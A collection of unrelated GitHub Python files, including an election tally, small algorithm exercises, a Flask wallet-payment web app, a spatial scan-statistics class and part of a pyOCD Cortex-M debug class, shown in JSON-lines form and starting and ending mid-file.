candidate name and percentage of votes\n candidate_results = (f\"{candidate_name}: {vote_percentage:.1f}% ({votes:,})\\n\")\n print(candidate_results)\n # Save the candidate results to the text file\n txt_file.write(candidate_results)\n\n # Determining wining vote\n if (votes > winning_count) and (vote_percentage > winning_percentage):\n # if true set the following\n winning_count = votes\n winning_percentage = vote_percentage\n # winning_candidate equal to candidate's name\n winning_candidate = candidate_name\n\n # Winning candidate summary\n winning_candidate_summary = (\n f\"-------------------------\\n\"\n f\"Winner: {winning_candidate}\\n\"\n f\"Winning Vote Count: {winning_count:,}\\n\"\n f\"Winning Percentage: {winning_percentage:.1f}%\\n\"\n f\"---------------------------\\n\")\n print(winning_candidate_summary)\n\n # Save the winning candidate results to txt file\n txt_file.write(winning_candidate_summary)\n\nCYELLOW = '\\33[33m'\nCEND = '\\33[0m'\n\nauthorship_info = (\n f'****************************************\\n'\n f'* User current version: {sys_version} *\\n'\n f'* Author: {__author__} *\\n'\n f'* Credits: {__credits__} *\\n'\n f'* Version: {__version__} *\\n'\n f'* Status: {CYELLOW}{__status__}{CEND} *\\n'\n f'****************************************\\n' )\nprint(authorship_info)\n","repo_name":"amonjaras/Election_Analysis","sub_path":"PyPoll.py","file_name":"PyPoll.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74531777002","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\n\nimport math\n\n\ndef is_prime(n):\n \"\"\"It utilizes the fact that primes > 4 are 1(mod 6) or 5(mod 6):\n Every prime number is either of the form 6k+ 1;6k+ 5, or 2;3.\n Indeed, there are no primes of the form 6k, since 2 is a proper \n divisor of all such positive integers, the only prime of the \n form 6k+ 2 is 2, the only prime of the form 6k+ 3 is 3, and\n there are no primes of the form 6k+ 4, since again 2 is a \n proper divisor of all such positive integers. Since 2;3, no pi \n divides N, this means that N must be a product of only primes \n of the form 6k+ 1\"\"\"\n if n == 2 or n == 3: \n return True\n elif n < 2 or n % 2 == 0: \n return False\n elif n < 9:\n return True\n elif n % 3 == 0: \n return False\n\n r = int(math.sqrt(n))\n f = 5\n while f <= r:\n if n % f == 0 or n % (f + 2) == 0: \n return False\n else:\n f += 6\n return True\n\n\nif __name__ == \"__main__\":\n\n N = 1000\n for i in xrange(N, 1, -1):\n prime_i = str(i)\n if prime_i == prime_i[::-1] and is_prime(i):\n print(i)\n break\n","repo_name":"gabrielPeart/exercises","sub_path":"evaluations/codeeval/easy/prime_palindrome.py","file_name":"prime_palindrome.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1771763475","text":"# リサイズ\n# リサイズの際の画像圧縮のメソッドによる違いを見る\n# リサイズの第3引数でinterpolationを指定する\n# cv2.INTER_AREAのほうが自然な画像となることが確認できる\n\nimport cv2\n\nimg = cv2.imread(\"src/grapes.jpg\")\n\ncv2.imshow(\"img\", img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\nprint(img.shape)\n\nsize = (300, 200) # リサイズ\nimg_resize = cv2.resize(img, size)\n\nprint(img_resize.shape)\n\ncv2.imshow(\"resize\", img_resize)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\nimg_area = cv2.resize(img, size, interpolation=cv2.INTER_AREA)\nimg_linear = cv2.resize(img, size, interpolation=cv2.INTER_LINEAR)\ncv2.imshow(\"area\", img_area)\ncv2.imshow(\"linear\", img_linear)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"masachika-kamada/opencv-basic","sub_path":"project04.py","file_name":"project04.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15008963050","text":"class AVLTree:\n def __init__(self,data):\n self.data=data\n self.leftChild=None\n self.rightChild=None\n self.height=1\n\nnew_avl_tree=AVLTree(10)\nnew_avl_tree.leftChild=AVLTree(5)\nnew_avl_tree.rightChild=AVLTree(15)\n\ndef postOrderTraversal(rootNode):\n if not rootNode:\n return\n postOrderTraversal(rootNode.leftChild)\n postOrderTraversal(rootNode.rightChild)\n print(rootNode.data)\n\npostOrderTraversal(new_avl_tree)","repo_name":"saiharshithpalepu/DSA","sub_path":"AVLTree/postordertraversal.py","file_name":"postordertraversal.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36153135076","text":"import re\nimport sys\n\n# Initialize variables\nsw = 1\nb_count = 0\nb_sw = False\nlast_indent = 0\n\nfor line in sys.stdin:\n stripped_line = line.strip()\n\n # Count blank lines but don't write them\n if stripped_line == '':\n if sw > 0: \n sw = 0\n if sw == -1:\n sw = -2 # The line following the footer has a FF char which in Python3 is a line break.\n else:\n b_count += 1\n else: # Handle a non-blank line\n if sw == 0: \n sw = 1\n if sw < 0: \n sw -= 1 # If we're between pages, count footer/dashes/header\n if sw <= -4: # If we're at the header, resume printing\n this_indent = len(line) - len(line.lstrip())\n if b_sw or this_indent < last_indent: \n print('') # Print a blank line, if needed\n sw = 1\n b_count = 0\n b_sw = False\n\n if re.search(r'\\[Page [0-9]+\\] *$', stripped_line): # Found the footer:\n sw = -1 # Stop output\n b_sw = b_count > 3 # true = print blank line when resuming output\n elif sw > 0:\n # Print a blank line if the previous line(s) was/were blank\n if b_count: \n print('')\n b_count = 0\n print(line, end='')\n last_indent = len(line) - len(line.lstrip())\n\n# # Print final line break for consistency with the awk script\n# print()\n","repo_name":"jimwhite/wiki3","sub_path":"indexer/rfc_depage.py","file_name":"rfc_depage.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72894070123","text":"from flask import Blueprint, redirect, request, render_template, url_for, flash\nfrom flask import Blueprint, render_template, flash, redirect, url_for,current_app, session\nfrom auth.forms import LoginForm, RegisterForm , SendMoneyForm, RequestMoneyForm\nfrom sql.db import DB\nimport json\nfrom datetime import datetime, date, timedelta\nfrom collections import defaultdict\n\nfrom flask import jsonify\n#import dateutil.parser\nfrom flask_login import login_user, login_required, logout_user, current_user\nfrom auth.models import User\nfrom sql.db import DB\n\n\nmain_menu = Blueprint('main_menu', __name__, url_prefix='/main_menu')\n\n\n@main_menu.route('/account_info', methods=['GET', 'POST'])\n@login_required\ndef account_info():\n user_email = current_user.get_email()\n result1={}\n try:\n result = DB.selectOne(\"SELECT SSN,NAME,BALANCE FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD =%s \",user_email)\n print(result)\n result2 = DB.selectAll(\"SELECT HA.BANK_ID, HA.BANK_NUMBER FROM USER_ACCOUNT as UA JOIN HAS_ADDITIONAL as HA WHERE UA.SSN=HA.SSN AND UA.SSN=%s\",result.row[\"SSN\"])\n print(result2)\n if result.status:\n flash(\"USER DETAILS FOUND\", \"success\")\n except Exception as e:\n # TODO make this user-friendly\n flash(f\"Error! value not found {e}\", \"danger\")\n return render_template(\"account_info.html\", info=result.row,resp=result2)\n\n@main_menu.route('/send', methods=['GET', 'POST'])\n@login_required\ndef send():\n form = SendMoneyForm()\n if form.validate_on_submit():\n user_email = current_user.get_email()\n send_email = form.email.data\n amount = form.amount.data\n memo = form.memo.data\n print(user_email)\n try:\n result= DB.selectOne(\"SELECT * FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD = %s\" ,send_email)\n if result.status:\n try:\n res_amt = DB.selectOne(\"Select BALANCE,SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \",user_email)\n if(res_amt.row[\"BALANCE\"] > amount):\n update_send= DB.update(\"UPDATE USER_ACCOUNT SET BALANCE = BALANCE + %s WHERE SSN= %s \",amount,result.row[\"SSN\"])\n update_user= DB.update(\"UPDATE USER_ACCOUNT SET BALANCE = BALANCE - %s WHERE SSN= %s \",amount,res_amt.row[\"SSN\"])\n flash(\"Transaction Made\",\"success\")\n try:\n res=DB.insertOne(\"INSERT INTO SEND_TRANSACTION(AMOUNT, MEMO, IDENTIFIER, SSN) values (%s,%s,%s,%s)\",amount,memo,send_email,res_amt.row[\"SSN\"])\n except Exception as e:\n flash(f\"{e}\",\"danger\")\n else:\n flash(\"Insufficient Amount\",\"danger\")\n except Exception as e:\n flash(\"User doesn't exist.\",\"danger\")\n \n except Exception as e:\n flash(\"User doesn't exist.\",\"danger\")\n\n return render_template(\"send_money.html\",form=form)\n\n@main_menu.route('/request_money', methods=['GET', 'POST'])\n@login_required\ndef request_money():\n user_id = current_user.get_id()\n\n form = RequestMoneyForm()\n if form.validate_on_submit():\n user_email = current_user.get_email()\n request_email = form.email.data\n amount = form.amount.data\n memo = form.memo.data\n\n print(user_email)\n try:\n result= DB.selectOne(\"SELECT * FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD = %s\" ,request_email)\n if(result.row != None):\n if result.status:\n try:\n res_amt = DB.selectOne(\"Select SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \",user_email)\n res=DB.insertOne(\"INSERT INTO REQUEST_TRANSACTION(AMOUNT, MEMO, SSN) values (%s,%s,%s)\",amount,memo,res_amt.row[\"SSN\"])\n res_rtid=DB.selectOne(\"Select RT_ID FROM REQUEST_TRANSACTION ORDER BY RT_ID DESC LIMIT 1\")\n res1=DB.insertOne(\"INSERT INTO FROM_TRANSACTION (RT_ID, IDENTIFIER) values (%s,%s)\",res_rtid.row[\"RT_ID\"],request_email)\n if res.status:\n flash(\"Success data went into database\",\"success\")\n except Exception as e:\n flash(f\"{e}\",\"danger\")\n else:\n flash(\"User doesn't exist.\",\"danger\")\n except Exception as e:\n flash(\"User doesn't exist.\",\"danger\")\n\n return render_template(\"request_money.html\",form=form)\n\n@main_menu.route('/pending_requests', methods=['GET', 'POST'])\n@login_required\ndef pending_requests():\n user_id = current_user.get_id()\n user_email= current_user.get_email()\n print(\"---------------------------------------------\")\n #flash(f\"ID IS {user_id}\",\"success\")\n result= DB.selectAll(\"SELECT R.RT_ID,AMOUNT,MEMO, DATE_TIME FROM REQUEST_TRANSACTION R, FROM_TRANSACTION F WHERE R.RT_ID=F.RT_ID AND IDENTIFIER=%s ORDER BY DATE_TIME ASC\",user_email)\n if result.status:\n flash(\"Working\", \"success\")\n return render_template(\"pending_requests.html\",resp=result)\n\n\n@main_menu.route('/payment///')\n@login_required\ndef payment(amount,rt_id,memo):\n user_email = current_user.get_email()\n user_balance = DB.selectOne(\"Select BALANCE,SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \",user_email)\n print(user_balance.row[\"BALANCE\"])\n receiver_SSN = DB.selectOne(\"Select BALANCE,SSN FROM REQUEST_TRANSACTION NATURAL JOIN USER_ACCOUNT WHERE RT_ID=%s \",rt_id)\n print(user_email)\n print(amount)\n try:\n result= DB.selectOne(\"SELECT * FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE SSN = %s\" ,receiver_SSN.row[\"SSN\"])\n \n try:\n print(\"INSIDE TRY\",user_balance.row[\"BALANCE\"])\n\n if(user_balance.row[\"BALANCE\"] > amount):\n update_send= DB.update(\"UPDATE USER_ACCOUNT SET BALANCE = BALANCE + %s WHERE SSN= %s \",amount,result.row[\"SSN\"])\n update_user= DB.update(\"UPDATE USER_ACCOUNT SET BALANCE = BALANCE - %s WHERE SSN= %s \",amount,user_balance.row[\"SSN\"])\n delete_request= DB.delete(\"DELETE FROM REQUEST_TRANSACTION WHERE RT_ID=%s\",rt_id)\n res=DB.insertOne(\"INSERT INTO SEND_TRANSACTION(AMOUNT, MEMO, IDENTIFIER, SSN) values (%s,%s,%s,%s)\",amount,memo,result.row[\"EMAIL_ADD\"],user_balance.row[\"SSN\"])\n flash(\"Transaction Made\",\"success\")\n else:\n flash(\"Insufficient Amount\",\"danger\")\n except Exception as e:\n flash(\"Insufficient Amount\",\"danger\")\n except Exception as e:\n flash(\"User doesn't exist.\",\"danger\")\n return pending_requests()\n\n\n#def DecodeDateTime(result):\n #if 'DATE_TIME' in result:\n# result[\"DATE_TIME\"] = dateutil.parser.parse(result[\"DATE_TIME\"])\n# return result\n\n\"\"\" @main_menu.route('/statements', methods=['GET', 'POST'])\n@login_required\ndef statements():\n user_email = current_user.get_email()\n user_ssn = DB.selectOne(\"Select SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \",user_email)\n user_id = current_user.get_id()\n print(\"---------------------------------------------\")\n #flash(f\"ID IS {user_id}\",\"success\")\n result= DB.selectAll(\"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME FROM SEND_TRANSACTION WHERE IDENTIFIER=%s OR SSN=%s ORDER BY DATE_TIME DESC\", user_email, user_ssn.row[\"SSN\"])\n if result.status:\n flash(\"Working\", \"success\")\n return render_template(\"statements.html\",resp=result) \"\"\"\n\n@main_menu.route('/monthly_statements', methods=['GET', 'POST'])\n@login_required\ndef monthly_statements():\n user_email = current_user.get_email()\n user_ssn = DB.selectOne(\"SELECT SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \", user_email)\n user_id = current_user.get_id()\n print(\"---------------------------------------------\")\n #flash(f\"ID IS {user_id}\",\"success\")\n result = DB.selectAll(\"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME, SSN FROM SEND_TRANSACTION WHERE IDENTIFIER=%s OR SSN=%s ORDER BY DATE_TIME DESC\", user_email, user_ssn.row[\"SSN\"])\n if result.status:\n flash(\"Working\", \"success\")\n\n # group transactions by month\n transactions_by_month = {}\n total_sent_by_month = {}\n total_received_by_month = {}\n\n for transaction in result.rows:\n month = transaction[\"DATE_TIME\"].strftime(\"%B\")\n if month not in transactions_by_month:\n transactions_by_month[month] = []\n total_sent_by_month[month] = 0\n total_received_by_month[month] = 0\n transactions_by_month[month].append(transaction)\n if transaction[\"SSN\"] == user_ssn.row[\"SSN\"]:\n total_sent_by_month[month] += transaction[\"AMOUNT\"]\n elif transaction[\"IDENTIFIER\"] == user_email:\n total_received_by_month[month] += transaction[\"AMOUNT\"]\n\n return render_template(\"monthly_statements.html\",\n transactions_by_month=transactions_by_month,\n total_sent_by_month=total_sent_by_month,\n total_received_by_month=total_received_by_month)\n\n\n\n@main_menu.route('/search_transactions', methods=['GET', 'POST'])\n@login_required\ndef search_transactions():\n user_email = current_user.get_email()\n user_ssn = DB.selectOne(\"SELECT SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s\", user_email)\n user_id = current_user.get_id()\n\n # Handle search\n search_query = request.args.get('search_query')\n if search_query:\n sql_statement = \"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME FROM SEND_TRANSACTION WHERE (IDENTIFIER=%s OR SSN=%s) AND (IDENTIFIER=%s OR STID=%s OR AMOUNT=%s OR MEMO=%s) ORDER BY DATE_TIME DESC\"\n result = DB.selectAll(sql_statement, user_email, user_ssn.row[\"SSN\"], search_query, search_query, search_query, search_query)\n else:\n sql_statement = \"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME FROM SEND_TRANSACTION WHERE IDENTIFIER=%s OR SSN=%s ORDER BY DATE_TIME DESC\"\n result = DB.selectAll(sql_statement, user_email, user_ssn.row[\"SSN\"])\n\n\n if result.status:\n flash(\"Working\", \"success\")\n\n return render_template(\"search_transaction.html\", resp=result.rows)\n\n\n@main_menu.route('/totalamount', methods=['GET', 'POST'])\n@login_required\ndef totalamount():\n user_email = current_user.get_email()\n user_ssn = DB.selectOne(\"SELECT SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \", user_email)\n user_id = current_user.get_id()\n\n start_date = None\n end_date = None\n if request.method == 'POST':\n start_date_str = request.form.get('start_date')\n end_date_str = request.form.get('end_date')\n start_date = datetime.strptime(start_date_str, '%Y-%m-%d')\n end_date = datetime.strptime(end_date_str, '%Y-%m-%d')\n result = DB.selectAll(\"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME, SSN FROM SEND_TRANSACTION WHERE (IDENTIFIER=%s OR SSN=%s) AND DATE_TIME >= %s AND DATE_TIME <= %s ORDER BY DATE_TIME DESC\", user_email, user_ssn.row[\"SSN\"], start_date, end_date)\n else:\n result = DB.selectAll(\"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME, SSN FROM SEND_TRANSACTION WHERE IDENTIFIER=%s OR SSN=%s ORDER BY DATE_TIME DESC\", user_email, user_ssn.row[\"SSN\"])\n \n if result.status:\n flash(\"Working\", \"success\")\n\n transactions = []\n total_sent = 0\n total_received = 0\n\n for transaction in result.rows:\n if start_date and end_date:\n if start_date <= transaction[\"DATE_TIME\"] <= end_date:\n transactions.append(transaction)\n if transaction[\"SSN\"] == user_ssn.row[\"SSN\"]:\n total_sent += transaction[\"AMOUNT\"]\n elif transaction[\"IDENTIFIER\"] == user_email:\n total_received += transaction[\"AMOUNT\"]\n else:\n transactions.append(transaction)\n if transaction[\"SSN\"] == user_ssn.row[\"SSN\"]:\n total_sent += transaction[\"AMOUNT\"]\n elif transaction[\"IDENTIFIER\"] == user_email:\n total_received += transaction[\"AMOUNT\"]\n\n return render_template(\"totalamount.html\",\n transactions=transactions,\n total_sent=total_sent,\n total_received=total_received)\n\n\n@main_menu.route('/avgmoney', methods=['GET', 'POST'])\n@login_required\ndef avgmoney():\n user_email = current_user.get_email()\n user_ssn = DB.selectOne(\"SELECT SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \", user_email)\n user_id = current_user.get_id()\n print(\"---------------------------------------------\")\n #flash(f\"ID IS {user_id}\",\"success\")\n result = DB.selectAll(\"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME, SSN FROM SEND_TRANSACTION WHERE IDENTIFIER=%s OR SSN=%s ORDER BY DATE_TIME DESC\", user_email, user_ssn.row[\"SSN\"])\n if result.status:\n flash(\"Working\", \"success\")\n\n # group transactions by month\n transactions_by_month = {}\n total_sent_by_month = {}\n total_received_by_month = {}\n\n for transaction in result.rows:\n month = transaction[\"DATE_TIME\"].strftime(\"%B\")\n if month not in transactions_by_month:\n transactions_by_month[month] = []\n total_sent_by_month[month] = 0\n total_received_by_month[month] = 0\n transactions_by_month[month].append(transaction)\n if transaction[\"SSN\"] == user_ssn.row[\"SSN\"]:\n total_sent_by_month[month] += transaction[\"AMOUNT\"]\n elif transaction[\"IDENTIFIER\"] == user_email:\n total_received_by_month[month] += transaction[\"AMOUNT\"]\n \n # calculate average money sent and received per month\n num_months = len(transactions_by_month)\n avg_sent_by_month = {month: total_sent_by_month[month]/num_months for month in total_sent_by_month}\n avg_received_by_month = {month: total_received_by_month[month]/num_months for month in total_received_by_month}\n\n return render_template(\"avgmoney.html\",\n transactions_by_month=transactions_by_month,\n avg_sent_by_month=avg_sent_by_month,\n avg_received_by_month=avg_received_by_month)\n\n\n@main_menu.route('/maxmoney', methods=['GET', 'POST'])\n@login_required\ndef maxmoney():\n user_email = current_user.get_email()\n user_ssn = DB.selectOne(\"SELECT SSN FROM EMAIL NATURAL JOIN USER_ACCOUNT WHERE EMAIL_ADD=%s \", user_email)\n user_id = current_user.get_id()\n print(\"---------------------------------------------\")\n grant_perm=(\"GRANT EXECUTE ON FUNCTION DATE_TRUNC TO 'jc2494'@'%';\")\n test_query=DB.selectAll(\"\"\"SELECT DATE_FORMAT(DATE_TIME, '%Y-%m') AS month,\n MAX(CASE WHEN SSN = %s THEN AMOUNT ELSE 0 END) AS max_sent,\n MAX(CASE WHEN IDENTIFIER = %s THEN AMOUNT ELSE 0 END) AS max_received\nFROM SEND_TRANSACTION\nWHERE IDENTIFIER = %s OR SSN = %s\nGROUP BY month\"\"\",user_ssn.row[\"SSN\"],user_email,user_ssn.row[\"SSN\"],user_email)\n print(\"printing test query result: \",test_query)\n #flash(f\"ID IS {user_id}\",\"success\")\n result = DB.selectAll(\"SELECT STID, AMOUNT, MEMO, CANCEL_REASON, IDENTIFIER, DATE_TIME, SSN FROM SEND_TRANSACTION WHERE IDENTIFIER=%s OR SSN=%s ORDER BY DATE_TIME DESC\", user_email, user_ssn.row[\"SSN\"])\n if result.status:\n flash(\"Working\", \"success\")\n\n # group transactions by month\n transactions_by_month = {}\n total_sent_by_month = {}\n total_received_by_month = {}\n\n for transaction in result.rows:\n month = transaction[\"DATE_TIME\"].strftime(\"%B %Y\")\n if month not in transactions_by_month:\n transactions_by_month[month] = []\n total_sent_by_month[month] = []\n total_received_by_month[month] = []\n transactions_by_month[month].append(transaction)\n if transaction[\"SSN\"] == user_ssn.row[\"SSN\"]:\n total_sent_by_month[month].append(transaction[\"AMOUNT\"])\n elif transaction[\"IDENTIFIER\"] == user_email:\n total_received_by_month[month].append(transaction[\"AMOUNT\"])\n\n # find transactions with maximum amount sent and received per month\n max_sent_by_month = {month: max(total_sent_by_month[month]) if total_sent_by_month[month] else 0 for month in total_sent_by_month}\n max_received_by_month = {month: max(total_received_by_month[month]) if total_received_by_month[month] else 0 for month in total_received_by_month}\n max_sent_transactions = []\n max_received_transactions = []\n\n for month in transactions_by_month:\n for transaction in transactions_by_month[month]:\n if transaction[\"SSN\"] == user_ssn.row[\"SSN\"] and transaction[\"AMOUNT\"] == max_sent_by_month[month]:\n max_sent_transactions.append(transaction)\n elif transaction[\"IDENTIFIER\"] == user_email and transaction[\"AMOUNT\"] == max_received_by_month[month]:\n max_received_transactions.append(transaction)\n\n return render_template(\"maxmoney.html\",transactions_by_month=transactions_by_month,\n max_sent_transactions=max_sent_transactions,\n max_received_transactions=max_received_transactions, user_ssn=user_ssn,max_sent_by_month=max_sent_by_month)\n\n\n","repo_name":"mricha828/Wallet-Payment-Network","sub_path":"DMSDProject-main/views/main_menu.py","file_name":"main_menu.py","file_ext":"py","file_size_in_byte":17515,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"41389688042","text":"\"\"\"Main Class for Scan Statistics\"\"\"\n\nimport logging\nimport pandas as pd\n\nfrom SpatialScan.preprocessing import data_preprocessor\nfrom SpatialScan.timeseries import count_baseline\nfrom SpatialScan.scan import scan\nfrom SpatialScan.results import database_results, visualise_results_from_database\nfrom SpatialScan.region import make_region_from_res, plot_region_time_series, plot_region_by_rank\n\n\nclass ScanStatistic:\n \"\"\"Simple helper class to reduce number of function calls when modelling\"\"\"\n\n def __init__(\n self,\n readings,\n grid_resolution=8,\n percentage_missing=20,\n max_anom_per_day=1,\n N_sigma=3,\n repeats=1,\n rolling_hours=24,\n fap_threshold=1e-40,\n consecutive_missing_threshold=3,\n global_threshold=False,\n drop_sparse=True,\n drop_anomalous=True,\n drop_aperiodic=True,\n drop_consecutives=True,\n data_type=\"scoot\",\n days_in_past=28,\n days_in_future=1,\n ts_method=\"HW\",\n alpha=0.03869791,\n beta=0.0128993,\n gamma=0.29348953,\n kernel=None,\n ):\n self.readings = readings\n self.grid_resolution = grid_resolution\n self.percentage_missing = percentage_missing\n self.max_anom_per_day = max_anom_per_day\n self.N_sigma = N_sigma\n self.repeats = repeats\n self.rolling_hours = rolling_hours\n self.fap_threshold = fap_threshold\n self.consecutive_missing_threshold = consecutive_missing_threshold\n self.global_threshold = global_threshold\n self.drop_sparse = drop_sparse\n self.drop_anomalous = drop_anomalous\n self.drop_aperiodic = drop_aperiodic\n self.drop_consecutives = drop_consecutives\n self.data_type = data_type\n self.days_in_past = days_in_past\n self.days_in_future = days_in_future\n self.ts_method = ts_method\n self.alpha = alpha\n self.beta = beta\n self.gamma = gamma\n self.kernel = kernel\n\n # results at each stage of pipeline\n self.processed = None\n self.forecast = None\n self.all_results = None\n self.grid_results = None\n\n def run(self):\n \"\"\"Build scan results\"\"\"\n self.processed = data_preprocessor(\n self.readings,\n self.percentage_missing,\n self.max_anom_per_day,\n self.N_sigma,\n self.repeats,\n self.rolling_hours,\n self.fap_threshold,\n self.consecutive_missing_threshold,\n self.global_threshold,\n self.drop_sparse,\n self.drop_anomalous,\n self.drop_aperiodic,\n self.drop_consecutives,\n )\n self.forecast = count_baseline(\n self.processed,\n self.days_in_past,\n self.days_in_future,\n self.ts_method,\n alpha=self.alpha,\n beta=self.beta,\n gamma=self.gamma,\n kern=self.kernel,\n )\n self.all_results = scan(self.forecast, self.grid_resolution)\n self.grid_results = database_results(self.all_results)\n\n def plot(self, metric=\"av_lhd_score_EBP\"):\n \"\"\"Plot animation plot from results\"\"\"\n if isinstance(self.grid_results, pd.DataFrame):\n visualise_results_from_database(self.grid_results, metric=metric)\n else:\n logging.info(\" Results not populated. Call `run()` first.\")\n\n def highest_region(self):\n \"\"\"Return highest region\"\"\"\n if isinstance(self.all_results, pd.DataFrame):\n return self.all_results.iloc[0]\n logging.info(\"Results not populated. Call `run()` first.\")\n\n def plot_region_time_series(self, rank=0, legend=False):\n if not isinstance(self.all_results, pd.DataFrame):\n raise TypeError('Run the scan first')\n region = make_region_from_res(self.all_results, rank=rank)\n plot_region_time_series(region, self.forecast, add_legend=legend)\n \n def plot_region_by_rank(self, rank=0, legend=False):\n if not isinstance(self.all_results, pd.DataFrame):\n raise TypeError('Run the scan first')\n plot_region_by_rank(rank, self.all_results, self.forecast, add_legend=legend)\n\n def model_settings(self):\n settings = self.__dict__.copy()\n del settings['readings']\n del settings['processed']\n del settings['forecast']\n del settings['all_results']\n del settings['grid_results']\n print(settings)\n","repo_name":"TeddyTW/SpatialScan","sub_path":"SpatialScan/scanstatistic.py","file_name":"scanstatistic.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"35654667321","text":"import sys\nfrom cyvcf2 import VCF\n\nif len(sys.argv) != 2:\n\tprint(f\"Usage: {sys.argv[0]} \")\n\tsys.exit(1)\n\nvcf_file = sys.argv[1]\nfor variant in VCF(vcf_file):\n\tif variant.FILTER == None: # when FILTER == \"PASS\", cyvcf2 puts None on the FILTER variable\n\t\tboth_genotypes = variant.genotypes[0][:2]\n\t\tgt_1 = both_genotypes[0]\n\t\tgt_2 = both_genotypes[1]\n\t\tif gt_1 != -1 and gt_2 != -1:\n\t\t\tprint(str(gt_1) if gt_1==gt_2 else f\"{gt_1}/{gt_2}\")\n","repo_name":"leoisl/random","sub_path":"gt_reader/test_read_vcf_cyvcf2.py","file_name":"test_read_vcf_cyvcf2.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40948331773","text":"import logging\n\nfrom .cortex_m import CortexM\nfrom .core_ids import (CORE_TYPE_NAME, CoreArchitecture, CortexMExtension)\nfrom ..core.target import Target\nfrom .cortex_m_core_registers import CoreRegisterGroups\n\nLOG = logging.getLogger(__name__)\n\nclass CortexM_v8M(CortexM):\n \"\"\"@brief Component class for a v8.x-M architecture Cortex-M core.\"\"\"\n\n ARMv8M_BASE = 0xC\n ARMv8M_MAIN = 0xF\n\n ## DFSR.PMU added in v8.1-M.\n DFSR_PMU = (1 << 5)\n\n DSCSR = 0xE000EE08\n DSCSR_CDSKEY = 0x00020000\n DSCSR_CDS = 0x00010000\n DSCSR_SBRSEL = 0x00000002\n DSCSR_SBRSELEN = 0x00000001\n\n # Processor Feature Register 0\n PFR0 = 0xE000ED40\n PFR0_RAS_MASK = 0xf0000000\n PFR0_RAS_SHIFT = 28\n PFR0_RAS_VERSION_1 = 2\n\n # Processor Feature Register 1\n PFR1 = 0xE000ED44\n PFR1_SECURITY_MASK = 0x000000f0\n PFR1_SECURITY_SHIFT = 4\n\n PFR1_SECURITY_EXT_V8_0 = 0x1 # Base security extension.\n PFR1_SECURITY_EXT_V8_1 = 0x3 # v8.1-M adds several instructions.\n\n # Debug Feature Register 0\n DFR0 = 0xE000ED48\n DFR0_UDE_MASK = 0xf0000000\n DFR0_UDE_SHIFT = 28\n DFR0_UDE_SUPPORTED = 1\n\n # Media and FP Feature Register 1\n MVFR1 = 0xE000EF44\n MVFR1_MVE_MASK = 0x00000f00\n MVFR1_MVE_SHIFT = 8\n MVFR1_MVE__INTEGER = 0x1\n MVFR1_MVE__FLOAT = 0x2\n MVFR1_FP16_MASK = 0x00f00000\n MVFR1_FP16_SHIFT = 20\n MVFR1_FP16__SUPPORTED = 0x1 # FP16 format support is present.\n\n # Instruction Set Attribute Register 0\n ISAR0 = 0xE000ED60\n ISAR0_CMPBRANCH_MASK = 0x0000f000\n ISAR0_CMPBRANCH_SHIFT = 12\n ISAR0_CMPBRANCH__LOB = 0x3 # LOB instructions from v8.1-M are present.\n\n # Instruction Set Attribute Register 5\n ISAR5 = 0xE000ED74\n ISAR5_PACBTI_MASK = 0x00f00000\n ISAR5_PACBTI_SHIFT = 20\n ISAR5_PACBTI__NONE = 0x0 # PACBTI is not present.\n\n # PMU Type register\n PMU_TYPE = 0xE0003E00\n PMU_TYPE_N_MASK = 0x0000000f\n\n def __init__(self, rootTarget, ap, memory_map=None, core_num=0, cmpid=None, address=None):\n super().__init__(rootTarget, ap, memory_map, core_num, cmpid, address)\n\n @property\n def supported_security_states(self):\n \"\"\"@brief Tuple of security states supported by the processor.\n\n @return Tuple of @ref pyocd.core.target.Target.SecurityState \"Target.SecurityState\". The\n result depends on whether the Security extension is enabled.\n \"\"\"\n if self.has_security_extension:\n return 